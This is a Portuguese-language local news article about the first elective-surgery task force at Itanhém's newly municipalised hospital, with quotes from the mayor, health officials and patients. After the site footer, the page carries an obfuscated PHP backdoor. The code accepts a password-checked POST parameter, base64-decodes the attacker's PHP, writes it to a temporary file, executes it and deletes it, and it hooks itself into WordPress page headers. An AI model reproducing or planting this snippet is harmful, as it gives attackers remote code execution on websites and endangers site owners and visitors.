• SEJA BEM-VINDO

Hospital de Itanhém realiza Mutirão de Cirurgias pela primeira vez depois de ser municipalizado

Publicado em: 28/03/2022 Atualizado:: março 28, 2022

 

Foram feitos procedimentos cirúrgicos de média complexidade, como histerectomia, laqueadura, fístula anal, pedras na vesícula e cirurgias de hérnia, adulto e infantil

 

Itanhém realizou, pela primeira vez, com o hospital sendo municipal, um mutirão de cirurgias eletivas, para pacientes da sede e distritos.

 

Foram feitos procedimentos cirúrgicos de média complexidade, como histerectomia, laqueadura, fístula anal, pedras na vesícula e cirurgias de hérnia, adulto e infantil.

 

 

De acordo com secretária da Saúde, Aline Araújo, 22 pessoas foram operadas pelas equipes dos cirurgiões Dr. Lauro Oscar e Dr. Raphael Matos. A equipe conta ainda com Dr. Manoel Pedro (anestesiologista), além do técnico em enfermagem Cláudio Silva.

 

O prefeito Mildson Medeiros esteve visitando os pacientes e a equipe e falou da satisfação de estar trabalhando para melhorar a saúde do município. “Fizemos história de novo. Pela primeira vez, agora como Hospital Municipal, estamos oferecendo esses tipos de procedimentos para nossos pacientes, que tanto aguardaram na fila de espera. Isso nos alegra a alma! Quero agradecer toda equipe que se empenhou para que tudo desse certo e dizer à população que estamos avançando na Saúde, tem muita novidade pra acontecer”, disse o prefeito.

 

O senhor Lafaiete, morador de Ibirajá, disse que morou em São Paulo e que, lá, tentou realizar um procedimento por cinco anos, mas não conseguiu. “Olha, eu já aguardava por essa cirurgia há bastante tempo. Morava em São Paulo e tentei por cinco anos lá e não consegui. Depois que o hospital de Itanhém passou a ser público, facilitou mais para esse tipo de cirurgia e hoje eu consegui. Obrigado a todos”.

 

 

 

João Valci, 54 anos, morador de Itanhém, esperava por cirurgia há sete anos. “Fiquei na fila única do SUS sete anos e não saiu. Somente agora, com esse mutirão do Hospital Municipal que saiu para mim. Depois que o hospital passou para prefeitura tudo melhorou”.

 

Dona Iara, paciente moradora de Batinga, falou da importância da cirurgia dela ser feita em Itanhém. Para mim é um gasto a menos a comodidade, o conforto. É melhor porque é perto de casa e a minha cirurgia saiu rápido”.

 

 

A secretária da Saúde, Aline Araújo, disse que “a casa estava cheia”, mas, por um lado positivo, pois estava dando fluxo na fila de espera e que todas as cirurgias foram bem sucedidas. Ela agradeceu ao prefeito e à sua equipe e fez previsão de nova data para a realização de mais um mutirão. “Mildson é um prefeito participativo e não seria diferente para mais esta ação. Ele abraça a causa de todas as ações da Saúde. Ele já deu o aval para esse evento acontecer todo mês. A gente só vai depender da disponibilidade da equipe médica e, se tudo der certo, o próximo dia 14 de abril, novos pacientes serão operados aqui no Hospital”, afirmou.

 

 

A diretora do hospital, Maiane Mattos, também se expressou satisfeita com a ação. “É um acontecimento inédito para nós, algo muito esperado por todos os moradores do município, é algo especial para nossa equipe. Trabalhei em conjunto com Bruna Braga, na regulação, que fez o recebimento de toda documentação desses pacientes, os recebemos da melhor forma que pudemos, nossa equipe muito animada, muito disposta, graças a Deus. O hospital estava extremamente preparado, equipe maravilhosa, e estamos vendo a satisfação dos pacientes e também dos parentes dos pacientes, com o resultado das cirurgias. Então, o que eu tenho é só agradecer, ao prefeito pelo empenho, à nossa secretária pelo empenho e à nossa equipe. E que venham mais cirurgias!”, disse ela.

 

De acordo com Bruna Braga, para as marcações é necessário que o paciente tenha um encaminhamento médico para um especialista. Com o encaminhamento em mãos, a pessoa deve procurar o Centro de Referência, que fica na rua Vila Nova (em frente ao hospital) munido de cópia do cartão SUS, RG e comprovante de residência. Após passar por uma consulta com o médico especialista, havendo necessidade, o paciente é encaminhado para a fila cirurgia.

 


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}